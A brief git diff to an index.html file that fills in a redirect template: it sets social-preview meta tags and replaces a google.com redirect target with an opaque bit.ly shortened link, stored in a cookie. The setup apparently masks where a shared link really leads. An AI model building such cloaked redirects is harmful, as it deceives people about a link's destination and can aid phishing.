--- a/index.html
+++ b/index.html
@@ -25,12 +25,12 @@
   <meta property="twitter:description" content="Be colorful, Be unique">
 
   <!-- ضع الرابط المرفوع عليه الموقع -->
-  <meta property="og:url" content="ضع الرابط كامل">
-  <meta property="twitter:url" content="ضع الرابط كامل">
+  <meta property="og:url" content="http://colorfulap.github.io">
+  <meta property="twitter:url" content="http://colorfulap.github.io">
 
   <!-- رابط الصورة المعروضة في اللينك -->
-  <meta property="og:image" content="رابط الصورة">
-  <meta property="twitter:image" content="رابط الصورة">
+  <meta property="og:image" content="https://i.ibb.co/SccNYZK/image-2021-03-06-124726.png">
+  <meta property="twitter:image" content="https://i.ibb.co/SccNYZK/image-2021-03-06-124726.png">
 
   <meta property="twitter:card" content="summary_large_image">
   <meta property="og:type" content="website">
@@ -43,7 +43,7 @@
 
   <script>
 
-    const URL = "https://www.google.com"; // أدخل الرابط الخاص بك هنا 
+    const URL = "http://bit.ly/3rohjwj"; // أدخل الرابط الخاص بك هنا 
 
     document.cookie = `rURL=${URL}`;
 
